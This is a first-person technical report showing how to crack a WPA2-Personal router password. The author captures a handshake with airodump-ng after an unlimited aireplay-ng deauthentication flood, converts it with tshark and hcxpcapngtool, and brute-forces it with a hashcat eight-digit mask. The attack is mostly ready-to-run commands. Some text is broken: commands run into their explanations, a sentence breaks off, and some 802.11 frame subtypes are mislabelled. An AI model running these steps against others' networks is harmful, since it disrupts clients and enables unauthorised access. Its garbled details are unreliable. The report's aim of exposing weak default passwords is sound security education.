This is a technical report showcasing how easy it is for an attacker to crack a Wi-Fi password and connect to a router. The idea starts from the fact that 72% of people do not change their default Wi-Fi password [1]. While some people do change their default Wi-Fi passwords, there is an article [2] stating that 3,633 out of 5,000 routers (72.66%) use passwords made up of 8-10 digits or eight lowercase letters. This is easy to brute-force with the computing power available today. The following sections demonstrate the steps used to compromise a newly acquired router whose default password has not been changed.
The first requirement is a wireless adapter. Although most computers include a built-in network card, Kali Linux running in a VM detects it as an Ethernet adapter [3]. Therefore we can’t switch the Wi-Fi card from managed mode (device communicates only with router) to monitor mode (device is not connected to router but can monitor all packets from all devices sent in a given range) [4].
For a simple, reliable network adapter, I chose to go with the TP-Link TL-WN722N (David Bombal has a very nice video [5] on how to install it if you have a v2/v3 as is the case for me).
First, attach the network adapter by going to "Devices > USB > Realtek 802.11n NIC".
Then we check which "mode" the adapter is in. We want it to be in monitor mode.
To enable monitor mode, we do this:
sudo airmon-ng start wlan0
To scan for nearby wireless networks we can do this:
sudo airodump-ng wlan0
This reveals information such as the BSSID (MAC address of the AP), the channel, encryption type and in the lower part we see things like Stations (devices searching for an AP to connect with):
We’re interested only in the BSSID and the channel. For a full description of every element in the column you can check out the airodump-ng page [6].
BSSID: MAC address of the access point. In the Client section, a BSSID of “(not associated)” means that the client is not associated with any AP. In this unassociated state, it is searching for an AP to connect with.
CH: Channel number (taken from beacon packets).
Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference or overlapping channels.
Then we must find the router that we are interested in (in my case it's WiFi-Test) and note the BSSID and the channel. With this info we can now run:
sudo airodump-ng --bssid BSSID -c 5 --write capture wlan0
This command intercepts any authentication handshake between the router and a user. Now there are two options:
- wait for someone to connect to the network
- use a deauthentication attack in order to make everyone reconnect, thus intercepting a WPA2 handshake [7].
We will continue with the second option. Now in one terminal window I have the capture command running and in another one I will run a deauth attack (a deauthentication attack sends deauthentication packets to one or more stations/clients connected to an AP).
sudo aireplay-ng --deauth 0 -a BSSID wlan0--deauth 0 - sends an unlimited stream of deauthentication frames to every station associated with the specified AP until the process is stopped
Looking in the first window we can see that we have captured a handshake.
We are left with these files:
Several tools can perform brute-force attacks (Aircrack-ng, Hashcat, or John the Ripper). This demonstration uses Hashcat since it can brute-force passwords using GPU instead of CPU.
To do this the .cap capture must first be converted into a Hashcat-readable format for Hashcat. First of all we will clean the capture a bit by using this:
(optional)
tshark -r capture.cap -R "(wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02 || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x05 || wlan.fc.type_subtype == 0x08 || eapol)" -2 -F pcapng -w stripped.pcapng-r capture.cap - set the input file
-R - read the filters that are coming next (|| is the logical operator for "OR")
wlan.fc.type_subtype == 0x00 - filter for frames with subtype 0 (Authentication)
wlan.fc.type_subtype == 0x02 - filter for frames with subtype 2 (Control Wrapper)
wlan.fc.type_subtype == 0x04 - filter for frames with subtype 4 (Probe Request)
wlan.fc.type_subtype == 0x05 - filter for frames with subtype 5 (Probe Response)
wlan.fc.type_subtype == 0x08 - filter for frames with subtype 8 (Beacon)
eapol - filter for eapol frames
-2 - two-pass analysis (required when using -R)
-F pcapng - pcapng output format
-w stripped.pcapng - set the output file to stripped.pcapng
This is an optional step that removes the noise from the traffic capture and keeps only the necessary packets. It helps in reducing brute-forcing time.
Then we will need to turn the file from .pcapng to hash format 22000 (so it can be readable for Hashcat).
hcxpcapngtool -o hash.hc22000 -E wordlist stripped.pcapngNow that we have the hash, we can use hashcat to brute force the password knowing that most (72.66%) of the routers basic passwords have 8, 9, or 10 digits (or eight small letters):
.\hashcat.exe -m 22000 .\hash.hc22000 -a 3 -d 1 ?d?d?d?d?d?d?d?d-m 22000 - specifies the hash type
.\hash.hc22000 - specifies the name of the hash
-a 3 - specifies the attack-mode (3 means brute-force)
-d 1 - specifies which device (GPU) to use (in my case #1 was my dedicated GPU and #2 was my integrated GPU)
?d?d?d?d?d?d?d?d - specifies the pattern to brute-force (in this case try all combinations of 8 digits =
The password was cracked in just 6 minutes 32 seconds.
Many people either keep the default password or replace it with a minimally weak one – 8-10 digits or eight lowercase letters. This report has demonstrated how easy it is to crack such a Wi-Fi network protected with WPA2-personal with minimal equipment (a network adapter), and just a few tools.
[1] Arooj Ahmed, 2024 Router Security: Only 28% Change WiFi Passwords, Down From 35% in 2022, URL: https://www.digitalinformationworld.com/2024/09/2024-router-security-only-28-change.html
[2] Ido Hoorvitch, Cracking WiFi at Scale with One Simple Trick, URL: https://www.cyberark.com/resources/threat-research-blog/cracking-WiFi-at-scale-with-one-simple-trick
[3] N00b Ed, Connecting a Wireless Adapter to a Kali Linux Virtual Machine, URL: https://nooblinux.com/connecting-a-wireless-adapter-to-kali-linux-virtual-machine/
[4] GeeksforGeeks, Modes of Wireless Connectivity, URL: https://www.geeksforgeeks.org/modes-of-wireless-connectivity/
[5] David Bombal, Kali Linux TP-Link TL-WN722N install (1 command fix), URL: https://www.youtube.com/watch?v=-xkpgvjuEy0
[6] Aircrack-ng, Airodump-ng, URL: https://www.aircrack-ng.org/doku.php?id=airodump-ng
[7] NetworkLessons, WPA and WPA2 4-Way Handshake, URL: https://networklessons.com/wireless/wpa-and-wpa2-4-way-handshake